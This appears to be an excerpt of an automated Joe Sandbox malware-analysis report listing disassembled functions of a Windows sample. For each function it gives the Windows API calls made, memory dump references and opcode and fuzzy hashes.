                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: f44a5dc1373e3172efca7cce5edd97e9f913b087d525cc164b8ba50921768b8a
                    • Instruction ID: 0ea91844fd6b084ad438b4040efc4d0499049a00172851e41406dfc01df5ccf9
                    • Opcode Fuzzy Hash: f44a5dc1373e3172efca7cce5edd97e9f913b087d525cc164b8ba50921768b8a
                    • Instruction Fuzzy Hash: 08514831208204EFD754EB64C881F6AB7E9FF84714F448A2DF596872A1DB34E904CB56
                    Function 006EE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006EE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006EE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006EE8F2
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006EE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006EE91F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: 205e87174a7d1ae0b8c67d42a3077e8b92d28640ec8ee3af76631ec85ba9393d
                    • Instruction ID: 1800512c340cfb23e415f3fb5a49c54aecbac1cbc17c195c1714bfe287e8d025
                    • Opcode Fuzzy Hash: 205e87174a7d1ae0b8c67d42a3077e8b92d28640ec8ee3af76631ec85ba9393d
                    • Instruction Fuzzy Hash: 5C512A35A00205DFCF51EF65C9819AEBBF6FF09310B188199E849AB362CB31ED11CB64
                    Function 0070A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0701c4e90ffcf6b9597eb499a81781a38b478c40cd0b9d569a7d82c4ab1d69cf
                    • Instruction ID: 98e59d912d34fac055150f83586196fde4ba66dcded42add558bfe77b1e38fc6
                    • Opcode Fuzzy Hash: 0701c4e90ffcf6b9597eb499a81781a38b478c40cd0b9d569a7d82c4ab1d69cf
                    • Instruction Fuzzy Hash: 9241B039900304FBD720DB28CC48FA9BBE9EB0A310F154365F855A72E1DB78AD51DA52
                    Function 00682344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00682357
                    • ScreenToClient.USER32(007467B0,?), ref: 00682374
                    • GetAsyncKeyState.USER32(00000001), ref: 00682399
                    • GetAsyncKeyState.USER32(00000002), ref: 006823A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 4a0cc639f56783afbf0acb8d7e69e3ea870d7f837895fbcc2010634b2bc44b79
                    • Instruction ID: 3afa8d7045e1b88e816da5ec858074a56c2d315b9f2dc3617e88385a59ee2496
                    • Opcode Fuzzy Hash: 4a0cc639f56783afbf0acb8d7e69e3ea870d7f837895fbcc2010634b2bc44b79
                    • Instruction Fuzzy Hash: 3941817550411AFBDF199F68C854AEDBBB6FF05320F20431AF928A2290CB345E94DB91
                    Function 006D6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006D695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 006D69A9
                    • TranslateMessage.USER32(?), ref: 006D69D2
                    • DispatchMessageW.USER32(?), ref: 006D69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006D69EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: 17d494c7db0442b3bc6a4c12bb3a7fa9dd556ef29aef2ec02b744a2bd76f5e36
                    • Instruction ID: 57f0de4b8d1b41281ab49a561440d4ceacf6e1e75552248687d17f6836856988
                    • Opcode Fuzzy Hash: 17d494c7db0442b3bc6a4c12bb3a7fa9dd556ef29aef2ec02b744a2bd76f5e36
                    • Instruction Fuzzy Hash: 90310570D00203AACB20CF74CC84BF67BAEAB07304F14822BF021C63A1DB799886C795
                    Function 006D8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 006D8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 006D8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006D8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 006D8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006D8FDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 6eaa122aaf0a6a9e660debbbbf8c1d0a121099f89d808e426df35186b72fabbc
                    • Instruction ID: b05cab5b8459c55a897d78c39bbec3b21af5e1e11ef031e98c5dd958170daf5b
                    • Opcode Fuzzy Hash: 6eaa122aaf0a6a9e660debbbbf8c1d0a121099f89d808e426df35186b72fabbc
                    • Instruction Fuzzy Hash: 3931CE71900219EFDB14CF68DD4CAEE7BB6EB44315F10826AF925EB2D0CBB49914DB90
                    Function 006DB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindowVisible.USER32(?), ref: 006DB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006DB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006DB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006DB742
                    • _wcsstr.LIBCMT ref: 006DB74C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: 34161fced4ef6d689a0606d71f72762f100e2d8da8f4c45fdd9b7814bb30bcc6
                    • Instruction ID: 0fd0c0abfe05cba1c1d8a3209d467497fc6d4215ffac1ef5ff03f88fa6454251
                    • Opcode Fuzzy Hash: 34161fced4ef6d689a0606d71f72762f100e2d8da8f4c45fdd9b7814bb30bcc6
                    • Instruction Fuzzy Hash: 73210A31A04244FBEB255B399C49E7B7B9ADF4A750F01812EFC05CA365EF61CC4197A4
                    Function 0070B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • GetWindowLongW.USER32(?,000000F0), ref: 0070B44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0070B471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0070B489
                    • GetSystemMetrics.USER32(00000004), ref: 0070B4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,006F1184,00000000), ref: 0070B4D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: d38a14998f01b7a5d925e0cde0a6ace77941947d2a449edabc83afa3f4f64d25
                    • Instruction ID: f82cce9cdd22aafcda5389af99b8ece81e055bab48dafa24e64670d1acc200be
                    • Opcode Fuzzy Hash: d38a14998f01b7a5d925e0cde0a6ace77941947d2a449edabc83afa3f4f64d25
                    • Instruction Fuzzy Hash: 74219171510295EFCB209F38CC04A6A37E4FB05720F118739F926D22E1E7389A50DB80
                    Function 006D97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006D9802
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006D9834
                    • __itow.LIBCMT ref: 006D984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006D9874
                    • __itow.LIBCMT ref: 006D9885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 62d72dce1b117fb739f2ed54e51cbbfb4045f730a52c947fc194566a15e9cf09
                    • Instruction ID: 3c35cfb4a974ebf40f12e7c4cc0e44fef548d5a651b95733e473df5532e1e656
                    • Opcode Fuzzy Hash: 62d72dce1b117fb739f2ed54e51cbbfb4045f730a52c947fc194566a15e9cf09
                    • Instruction Fuzzy Hash: 0A210D31F00204ABDB20AA618C86EEE7BBAEF4AB14F044029FD05D7381DA71DD41D7E5
                    Function 006812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0068134D
                    • SelectObject.GDI32(?,00000000), ref: 0068135C
                    • BeginPath.GDI32(?), ref: 00681373
                    • SelectObject.GDI32(?,00000000), ref: 0068139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: edd688a37bd23130a1e6b9acc1152ca923b8bbf4b3354bb9d772ee158b5cd557
                    • Instruction ID: 055d64c70f37e2549f88d52c3875a626908d1dbc7c0c00acd416cc7c3af50d6f
                    • Opcode Fuzzy Hash: edd688a37bd23130a1e6b9acc1152ca923b8bbf4b3354bb9d772ee158b5cd557
                    • Instruction Fuzzy Hash: CF211274800308DFDB119F65DC047A97BBEFB13322F14C326F414AA6A0D7799992DB99
                    Function 006DC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 5ba562e6a0844a88596ef1c085a1d05743dc3709af8764f43e06e874947406d3
                    • Instruction ID: b003f392846b4e4b4b4ca419bf533f5af8e907952920cc5bfa14204115bd8671
                    • Opcode Fuzzy Hash: 5ba562e6a0844a88596ef1c085a1d05743dc3709af8764f43e06e874947406d3
                    • Instruction Fuzzy Hash: 290196B1A0422B7BD704B6245C42EEB635E9F523A4F044116FD04D6383E664AE12C6E4
                    Function 006E4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 006E4D5C
                    • __beginthreadex.LIBCMT ref: 006E4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 006E4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006E4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006E4DAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 044399272ca96aa3b58d3a8df32d1d142ce75957ec85cd7bccc0207de4e5630a
                    • Instruction ID: 51c5b1b1299491ed51e1503c6d9cfdbd0a6a56f60e91286138b74236ed91bff0
                    • Opcode Fuzzy Hash: 044399272ca96aa3b58d3a8df32d1d142ce75957ec85cd7bccc0207de4e5630a
                    • Instruction Fuzzy Hash: 63110876905348FBC7119FB99C04AEA7FADEB4A320F148366F914D3350DBB98D4487A1
                    Function 006D874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006D8766
                    • GetLastError.KERNEL32(?,006D822A,?,?,?), ref: 006D8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,006D822A,?,?,?), ref: 006D877F
                    • HeapAlloc.KERNEL32(00000000,?,006D822A,?,?,?), ref: 006D8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006D879D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: c9ed623623051bf36de354a3b5a3dcf709557e11c1e482224b74105ad4e43f8c
                    • Instruction ID: 955bb1e600447c1108ec5996dc221d8d4821dcec410afea3fecfc1bcc559287c
                    • Opcode Fuzzy Hash: c9ed623623051bf36de354a3b5a3dcf709557e11c1e482224b74105ad4e43f8c
                    • Instruction Fuzzy Hash: 8E014F71A00204EFDB208FA5DC4CDAB7B6DEF893557204529F849C3260DE31DC00CA60
                    Function 006E54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006E5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006E5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 006E5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006E5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006E555E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: 0ef34e018f2b69d55ec221d4e753ab3270180740cb3206088cee15dd143352bb
                    • Instruction ID: c40f439a1a8eeb2a3f2e2bf962f9d88f9419b959c52044701a54740ae9130f01
                    • Opcode Fuzzy Hash: 0ef34e018f2b69d55ec221d4e753ab3270180740cb3206088cee15dd143352bb
                    • Instruction Fuzzy Hash: EE015B31D01B5DDBCF10DFE9E8885EDBB7ABB09705F404156E802B2640DB349954C7A5
                    Function 006D85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006D8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006D8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006D8621
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006D8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006D863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 4fb9e8a17c5cb8c2d52f1ef3289914436a3061919358175033b33e57684f8bb9
                    • Instruction ID: 4f7b16ec0e152efd886f39b827757be11a6e19f6b9ae7cb7c26745266b62db6f
                    • Opcode Fuzzy Hash: 4fb9e8a17c5cb8c2d52f1ef3289914436a3061919358175033b33e57684f8bb9
                    • Instruction Fuzzy Hash: 25F04F31205304EFEB205FA9DC9DEAB3BADEF89764B008526F945C7250CF65DC41DA64
                    Function 006D8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006D8669
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006D8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006D8682
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006D8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006D869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 6df279e1cb57d07ce682456085991efb1d4aeb99d96113fcd51c715e72f5e6e8
                    • Instruction ID: f7aa8f0b55ed331d5270d287033b2c53a9d8d4ad47f640f80c6e73a0a999c0c9
                    • Opcode Fuzzy Hash: 6df279e1cb57d07ce682456085991efb1d4aeb99d96113fcd51c715e72f5e6e8
                    • Instruction Fuzzy Hash: 91F0A970200354FFEB211FA4EC8CEAB3BADEF89764B10412AF909C3250CEA4DC00DA60
                    Function 006DC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 006DC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 006DC6D1
                    • MessageBeep.USER32(00000000), ref: 006DC6E9
                    • KillTimer.USER32(?,0000040A), ref: 006DC705
                    • EndDialog.USER32(?,00000001), ref: 006DC71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
